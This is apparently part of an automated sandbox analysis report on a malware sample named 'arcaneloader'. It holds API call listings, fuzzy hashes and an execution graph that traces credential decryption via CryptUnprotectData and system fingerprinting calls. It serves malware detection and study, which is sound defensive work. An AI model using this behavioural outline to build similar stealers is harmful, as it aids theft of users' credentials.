                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1423051803-0
                                                                          • Opcode ID: 6be8c9c135ed4cd3ce4ee66044b334aa4e36f1ac16b5b95e06e775583ad34d61
                                                                          • Instruction ID: 26dc8e53a790a4cd911ca5249fce85a9d196047c87eceadac8337b2fd4e7b2ae
                                                                          • Opcode Fuzzy Hash: 6be8c9c135ed4cd3ce4ee66044b334aa4e36f1ac16b5b95e06e775583ad34d61
                                                                          • Instruction Fuzzy Hash: FB518DB2600257ABEB215E60CC82FBB7BAAEF44750B19452EF945D7141EBB1CC50E6B0
                                                                          APIs
                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00DC93FE,?,?,00000000,00000000,00000000,?), ref: 00DC951D
                                                                          • CatchIt.LIBVCRUNTIME ref: 00DC9603
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: CatchEncodePointer
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 1435073870-2084237596
                                                                          • Opcode ID: a63669ea7c26ad67384342fdedf8440132dda7b59e048ac64e159eb27a6ecd4d
                                                                          • Instruction ID: 020b0d047f95a929d8fc9fab7d67e6e9f3cfbaf46c5fa7d9a943ab3dad85a5b9
                                                                          • Opcode Fuzzy Hash: a63669ea7c26ad67384342fdedf8440132dda7b59e048ac64e159eb27a6ecd4d
                                                                          • Instruction Fuzzy Hash: 4241367190020AAFCF16DF98C995EEEBBB5EF48304F188099F905A7261D735A950DB60
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00DCDCFA,00000000,?,00DDCCD0,?,?,?,00DCDC31,00000004,InitializeCriticalSectionEx,00DD46F8,00DD4700), ref: 00DCDC6B
                                                                          • GetLastError.KERNEL32(?,00DCDCFA,00000000,?,00DDCCD0,?,?,?,00DCDC31,00000004,InitializeCriticalSectionEx,00DD46F8,00DD4700,00000000,?,00DC971C), ref: 00DCDC75
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00DCDC9D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad$ErrorLast
                                                                          • String ID: api-ms-
                                                                          • API String ID: 3177248105-2084034818
                                                                          • Opcode ID: 97581165e011446ee7df1e938ecc64b6adf033d89482b29bf4bffa3f1d2e1911
                                                                          • Instruction ID: 539e145d37cd73976ff6286b6199b0647ab5247c385f4350095ee8af228ff6dc
                                                                          • Opcode Fuzzy Hash: 97581165e011446ee7df1e938ecc64b6adf033d89482b29bf4bffa3f1d2e1911
                                                                          • Instruction Fuzzy Hash: FAE04830640306BFEF202B61DD06F593B5AAB00B54F244035F90DE91E1EBB3E811D578
                                                                          APIs
                                                                          • GetConsoleOutputCP.KERNEL32(D6D5FCFF,00000000,00000000,?), ref: 00DCE64B
                                                                            • Part of subcall function 00DCD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,00DC87B1,?,00000000,?), ref: 00DCD192
                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DCE89D
                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00DCE8E3
                                                                          • GetLastError.KERNEL32 ref: 00DCE986
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                          • String ID:
                                                                          • API String ID: 2112829910-0
                                                                          • Opcode ID: 0d49ad31a1d9cee5b83fa031f9b23030da5e4491e5f983165f8d5a3dcf2ea2d2
                                                                          • Instruction ID: 37034e598b144b05a9351c81658befe744e85b4a909ab2c9c97424389b73f3f9
                                                                          • Opcode Fuzzy Hash: 0d49ad31a1d9cee5b83fa031f9b23030da5e4491e5f983165f8d5a3dcf2ea2d2
                                                                          • Instruction Fuzzy Hash: 49D16AB5D0025A9FCB15CFA8C890AADBBB5FF09314F28452EE456EB351D630A942CF60
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustPointer
                                                                          • String ID:
                                                                          • API String ID: 1740715915-0
                                                                          • Opcode ID: 846778c4e4b5f4b93282686fd91d59f5ed88d7336cd9f5767361546a4fad38ac
                                                                          • Instruction ID: c08e5173d081f92745898ffdeb569455aa9c87041f1080513b757ffe2d86e089
                                                                          • Opcode Fuzzy Hash: 846778c4e4b5f4b93282686fd91d59f5ed88d7336cd9f5767361546a4fad38ac
                                                                          • Instruction Fuzzy Hash: 7A510372605607AFEB298F54D855FBAB3A5FF40300F18012DE9458B291EB31EC80EBB0
                                                                          APIs
                                                                            • Part of subcall function 00DCD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,00DC87B1,?,00000000,?), ref: 00DCD192
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00DCC95E,?,?,?,00000000), ref: 00DCC61C
                                                                          • __dosmaperr.LIBCMT ref: 00DCC623
                                                                          • GetLastError.KERNEL32(00000000,00DCC95E,?,?,00000000,?,?,?,00000000,00000000,?,00DCC95E,?,?,?,00000000), ref: 00DCC65D
                                                                          • __dosmaperr.LIBCMT ref: 00DCC664
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 1913693674-0
                                                                          • Opcode ID: 87844916a1b6b744991de371a2f3d593d74eff0664a85778042ec81be73de15a
                                                                          • Instruction ID: 79057b10d5cc6b9d47d8f3985c3534dff67bd3f1d49d57fb52b2e768cd64aa7f
                                                                          • Opcode Fuzzy Hash: 87844916a1b6b744991de371a2f3d593d74eff0664a85778042ec81be73de15a
                                                                          • Instruction Fuzzy Hash: 8021C171250307AF8B10AF618981F2AB7A8EF45364714A41DFA5DD3161D730EC418BB0
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00DCD235
                                                                            • Part of subcall function 00DCD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,00DC87B1,?,00000000,?), ref: 00DCD192
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DCD26D
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DCD28D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 158306478-0
                                                                          • Opcode ID: dabc13af86b12f6f31bafac874b1ee41181cdb2e81af1aede6522e100b1b6537
                                                                          • Instruction ID: 711c78ee95212e3357f446c634a5138c4a18b43789fe0627891e7d37245a02cd
                                                                          • Opcode Fuzzy Hash: dabc13af86b12f6f31bafac874b1ee41181cdb2e81af1aede6522e100b1b6537
                                                                          • Instruction Fuzzy Hash: 1311DBF160161B7E6B1127B19C8AE7FFA5DDE853A4714003EF802D3142FB60CD025579
                                                                          APIs
                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00DCFF31,00000000,00000001,00000000,?,?,00DCE9DA,?,00000000,00000000), ref: 00DD07D7
                                                                          • GetLastError.KERNEL32(?,00DCFF31,00000000,00000001,00000000,?,?,00DCE9DA,?,00000000,00000000,?,?,?,00DCE320,00000000), ref: 00DD07E3
                                                                            • Part of subcall function 00DD0840: CloseHandle.KERNEL32(FFFFFFFE,00DD07F3,?,00DCFF31,00000000,00000001,00000000,?,?,00DCE9DA,?,00000000,00000000,?,?), ref: 00DD0850
                                                                          • ___initconout.LIBCMT ref: 00DD07F3
                                                                            • Part of subcall function 00DD0815: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DD07B1,00DCFF1E,?,?,00DCE9DA,?,00000000,00000000,?), ref: 00DD0828
                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00DCFF31,00000000,00000001,00000000,?,?,00DCE9DA,?,00000000,00000000,?), ref: 00DD0808
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                          • String ID:
                                                                          • API String ID: 2744216297-0
                                                                          • Opcode ID: 9ff3f316b3c75579c1ea3984fce911a635f8e057f1265b1cb03af52e05fc8696
                                                                          • Instruction ID: ecfe8ec6e32544ad678ebe577ac54dacebe8b71850c013c0a54d27bab4335dde
                                                                          • Opcode Fuzzy Hash: 9ff3f316b3c75579c1ea3984fce911a635f8e057f1265b1cb03af52e05fc8696
                                                                          • Instruction Fuzzy Hash: 36F0FE36001658BBCF222F91DC04A897F2AFF48361F058413FA1885221C6728820ABB1
                                                                          APIs
                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00DC8D75
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ___except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3493665558-3733052814
                                                                          • Opcode ID: 0f9ffa1bd6b0708ec7e4353c37ada42874482dc784854197947462106587b8ee
                                                                          • Instruction ID: 676b56211a7c009ff9a50c3a765d87f9a73a40f95d696d97c4cd47c575a42ec1
                                                                          • Opcode Fuzzy Hash: 0f9ffa1bd6b0708ec7e4353c37ada42874482dc784854197947462106587b8ee
                                                                          • Instruction Fuzzy Hash: F331D27640025AEFCF225F94C804EAA7B6AFF08324B18455EF8455B121CB33DD61FBA1

                                                                          Execution Graph

                                                                          Execution Coverage:5%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:48.1%
                                                                          Total number of Nodes:208
                                                                          Total number of Limit Nodes:12
                                                                          execution_graph 29264 408f40 29265 408f4f 29264->29265 29266 408f57 SHGetSpecialFolderPathW 29265->29266 29267 4090d9 ExitProcess 29265->29267 29268 408f6d 29266->29268 29269 4090cf 29268->29269 29270 408f75 GetCurrentThreadId GetCurrentProcessId 29268->29270 29269->29267 29271 408fa1 GetForegroundWindow 29270->29271 29272 408f9d 29270->29272 29273 40907d 29271->29273 29272->29271 29273->29269 29275 40d420 CoInitializeEx 29273->29275 29276 4269c2 29277 4269cc 29276->29277 29277->29277 29283 441e80 29277->29283 29279 426c47 29280 426c31 GetLogicalDrives 29282 441e80 LdrInitializeThunk 29280->29282 29281 426ac1 29281->29279 29281->29280 29281->29281 29282->29279 29284 441ea0 29283->29284 29284->29284 29285 441fce 29284->29285 29287 43f4a0 LdrInitializeThunk 29284->29287 29285->29281 29287->29285 29288 4402c4 GetForegroundWindow 29292 441aa0 29288->29292 29290 4402d2 GetForegroundWindow 29291 4402ee 29290->29291 29293 441ab0 29292->29293 29293->29290 29532 433303 CoSetProxyBlanket 29294 40ed41 29299 435540 29294->29299 29296 40ed47 29297 40ed56 CoUninitialize 29296->29297 29298 40ed80 29297->29298 29300 435575 GetSystemMetrics GetSystemMetrics 29299->29300 29301 4355b8 29300->29301 29302 40eac1 29303 40eaf0 29302->29303 29305 40eb5e 29303->29305 29338 43f4a0 LdrInitializeThunk 29303->29338 29312 426f80 29305->29312 29307 40ebe8 29320 427210 29307->29320 29309 40ec08 29328 429590 29309->29328 29313 427020 29312->29313 29313->29313 29314 42711a 29313->29314 29315 4272fd 29313->29315 29339 4222f0 29313->29339 29343 442460 29313->29343 29314->29307 29347 4428b0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 29315->29347 29317 427319 29322 4270df 29320->29322 29321 442460 LdrInitializeThunk 29321->29322 29322->29320 29322->29321 29323 42711a 29322->29323 29324 4272fd 29322->29324 29327 4222f0 LdrInitializeThunk 29322->29327 29323->29309 29349 4428b0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 29324->29349 29326 427319 29327->29322 29329 4295b0 29328->29329 29331 4295fe 29329->29331 29350 43f4a0 LdrInitializeThunk 29329->29350 29330 40ec31 29331->29330 29351 43c9d0 29331->29351 29335 429696 29337 4296fe 29335->29337 29354 43f4a0 LdrInitializeThunk 29335->29354 29355 43ca40 29337->29355 29338->29305 29342 422300 29339->29342 29340 441e80 LdrInitializeThunk 29341 4223cd 29340->29341 29341->29313 29342->29340 29342->29341 29344 442480 29343->29344 29346 44256f 29344->29346 29348 43f4a0 LdrInitializeThunk 29344->29348 29346->29313 29347->29317 29348->29346 29349->29326 29350->29331 29352 43c9f0 29351->29352 29352->29352 29353 43ca27 RtlAllocateHeap 29352->29353 29353->29335 29354->29337 29356 43ca56 RtlFreeHeap 29355->29356 29357 43ca9d 29355->29357 29356->29357 29357->29330 29359 43f6c2 29360 43f6d0 29359->29360 29362 43f7ae 29360->29362 29365 43f4a0 LdrInitializeThunk 29360->29365 29366 43f4a0 LdrInitializeThunk 29362->29366 29364 43fd84 29365->29362 29366->29364 29367 42f6c5 29368 42f6d1 29367->29368 29369 42f79a GetPhysicallyInstalledSystemMemory 29368->29369 29370 42f7b9 29369->29370 29538 40d487 29539 40d4a0 29538->29539 29542 43a1c0 29539->29542 29541 40d4e8 29544 43a230 CoCreateInstance 29542->29544 29545 43a2fb SysAllocString 29544->29545 29546 43a86c 29544->29546 29549 43a393 29545->29549 29548 43a87c GetVolumeInformationW 29546->29548 29556 43a893 29548->29556 29550 43a39b CoSetProxyBlanket 29549->29550 29551 43a858 SysFreeString 29549->29551 29552 43a3bb SysAllocString 29550->29552 29553 43a84e 29550->29553 29551->29546 29555 43a490 29552->29555 29553->29551 29555->29555 29557 43a4fe SysAllocString 29555->29557 29556->29541 29560 43a529 29557->29560 29558 43a834 SysFreeString SysFreeString 29558->29553 29559 43a82a 29559->29558 29560->29558 29560->29559 29561 43a56d VariantInit 29560->29561 29562 43a5d0 29561->29562 29563 43a819 VariantClear 29562->29563 29563->29559 29371 40ec49 29384 429a10 29371->29384 29428 429a30 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 29384->29428 29446 41c8ca 29447 41c8d1 29446->29447 29450 41c95e 29447->29450 29455 43f4a0 LdrInitializeThunk 29447->29455 29449 41cad9 CryptUnprotectData 29449->29450 29451 41cec4 29449->29451 29450->29449 29450->29451 29454 41cfc6 29450->29454 29456 41f7a0 LdrInitializeThunk 29450->29456 29451->29454 29457 43ac70 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 29451->29457 29455->29450 29456->29450 29457->29454 29458 43ff4d 29459 43ff57 29458->29459 29460 44007e 29459->29460 29464 43f4a0 LdrInitializeThunk 29459->29464 29463 43f4a0 LdrInitializeThunk 29460->29463 29463->29460 29464->29460 29465 424450 29466 4244a0 29465->29466 29467 42445e 29465->29467 29469 424560 29467->29469 29470 424570 29469->29470 29470->29470 29471 441e80 LdrInitializeThunk 29470->29471 29472 42465f 29471->29472 29473 43f3d0 29474 43f478 29473->29474 29475 43f3ed 29473->29475 29476 43f46d 29473->29476 29479 43f3fb 29473->29479 29478 43ca40 RtlFreeHeap 29474->29478 29475->29474 29475->29479 29477 43c9d0 RtlAllocateHeap 29476->29477 29481 43f473 29477->29481 29478->29481 29479->29479 29480 43f458 RtlReAllocateHeap 29479->29480 29480->29481 29482 40d455 CoInitializeSecurity 29483 40e0e3 29485 40e110 29483->29485 29488 40e17d 29485->29488 29498 43f4a0 LdrInitializeThunk 29485->29498 29489 40f6c0 29488->29489 29496 40f6f0 29489->29496 29490 43f4a0 LdrInitializeThunk 29490->29496 29491 43c9d0 RtlAllocateHeap 29491->29496 29492 40e1ad 29495 43ca40 RtlFreeHeap 29495->29496 29496->29490 29496->29491 29496->29492 29496->29495 29497 4222f0 LdrInitializeThunk 29496->29497 29499 419450 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 29496->29499 29500 43cd70 LdrInitializeThunk 29496->29500 29497->29496 29498->29488 29499->29496 29500->29496 29564 439f20 29565 439f40 29564->29565 29567 439fee 29565->29567 29573 43f4a0 LdrInitializeThunk 29565->29573 29569 43a0b0 29567->29569 29570 43a0ae 29567->29570 29572 43f4a0 LdrInitializeThunk 29567->29572 29570->29569 29574 43f4a0 LdrInitializeThunk 29570->29574 29572->29570 29573->29567 29574->29569 29575 4425a0 29576 4425c0 29575->29576 29577 44262e 29576->29577 29585 43f4a0 LdrInitializeThunk 29576->29585 29578 44289c 29577->29578 29580 43c9d0 RtlAllocateHeap 29577->29580 29582 4426d7 29580->29582 29581 43ca40 RtlFreeHeap 29581->29578 29584 44276f 29582->29584 29586 43f4a0 LdrInitializeThunk 29582->29586 29584->29581 29585->29577 29586->29584 29587 40e5aa 29589 40e650 29587->29589 29588 40e6ce 29589->29588 29591 43f4a0 LdrInitializeThunk 29589->29591 29591->29588 29592 43f9a8 29594 43f9d0 29592->29594 29593 43fa5e 29594->29593 29596 43f4a0 LdrInitializeThunk 29594->29596 29596->29593 29506 40b270 29509 40b2b0 29506->29509 29507 40b75b 29508 43ca40 RtlFreeHeap 29508->29507 29509->29507 29509->29508 29509->29509 29597 438d33 GetUserDefaultUILanguage 29598 43cab0 29599 43cae0 29598->29599 29601 43cb4e 29599->29601 29608 43f4a0 LdrInitializeThunk 29599->29608 29600 43cd32 29601->29600 29602 43c9d0 RtlAllocateHeap 29601->29602 29605 43cbb7 29602->29605 29604 43ca40 RtlFreeHeap 29604->29600 29607 43cc4e 29605->29607 29609 43f4a0 LdrInitializeThunk 29605->29609 29607->29604 29608->29601 29609->29607 29522 42edfb 29523 42ee1b 29522->29523 29524 42eec9 GetComputerNameExA 29523->29524 29525 42ef10 GetComputerNameExA 29524->29525 29527 42efe0 29525->29527 29610 43fab9 29611 43fabb 29610->29611 29614 43f4a0 LdrInitializeThunk 29611->29614 29613 43fd84 29614->29613 29528 433d78 29531 419850 29528->29531 29530 433d7d CoSetProxyBlanket 29531->29530

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 43a1c0-43a222 1 43a230-43a27a 0->1 1->1 2 43a27c-43a29a 1->2 4 43a2a7-43a2f5 CoCreateInstance 2->4 5 43a29c 2->5 6 43a2fb-43a335 4->6 7 43a86c-43a891 call 4412a0 GetVolumeInformationW 4->7 5->4 8 43a340-43a364 6->8 12 43a893-43a897 7->12 13 43a89b-43a89d 7->13 8->8 10 43a366-43a395 SysAllocString 8->10 18 43a39b-43a3b5 CoSetProxyBlanket 10->18 19 43a858-43a868 SysFreeString 10->19 12->13 14 43a8ad-43a8b4 13->14 16 43a8b6-43a8bd 14->16 17 43a8cd-43a90d call 420fe0 14->17 16->17 20 43a8bf-43a8cb 16->20 26 43a910-43a918 17->26 22 43a3bb-43a3d5 18->22 23 43a84e-43a854 18->23 19->7 20->17 25 43a3e0-43a405 22->25 23->19 25->25 27 43a407-43a48b SysAllocString 25->27 26->26 28 43a91a-43a91c 26->28 29 43a490-43a4fc 27->29 30 43a8a0-43a8a7 28->30 31 43a91e-43a92e call 408890 28->31 29->29 32 43a4fe-43a52b SysAllocString 29->32 30->14 33 43a933-43a93a 30->33 31->30 37 43a531-43a553 32->37 38 43a834-43a84a SysFreeString * 2 32->38 40 43a82a-43a830 37->40 41 43a559-43a55c 37->41 38->23 40->38 41->40 42 43a562-43a567 41->42 42->40 43 43a56d-43a5c2 VariantInit 42->43 44 43a5d0-43a5e4 43->44 44->44 45 43a5e6-43a5f4 44->45 46 43a5f8-43a5fa 45->46 47 43a600-43a606 46->47 48 43a819-43a826 VariantClear 46->48 47->48 49 43a60c-43a61b 47->49 48->40 50 43a66f 49->50 51 43a61d-43a622 49->51 52 43a671-43a68b call 408810 50->52 53 43a646-43a64a 51->53 62 43a691-43a69d 52->62 63 43a7c7-43a7d8 52->63 55 43a630-43a638 53->55 56 43a64c-43a655 53->56 58 43a63b-43a644 55->58 59 43a657-43a662 56->59 60 43a664-43a668 56->60 58->52 58->53 59->58 60->58 61 43a66a-43a66d 60->61 61->58 62->63 64 43a6a3-43a6ab 62->64 65 43a7da 63->65 66 43a7df-43a7eb 63->66 67 43a6b0-43a6be 64->67 65->66 68 43a7f2-43a815 call 408840 call 408820 66->68 69 43a7ed 66->69 70 43a6d0-43a6d6 67->70 71 43a6c0-43a6c5 67->71 68->48 69->68 75 43a717-43a723 70->75 76 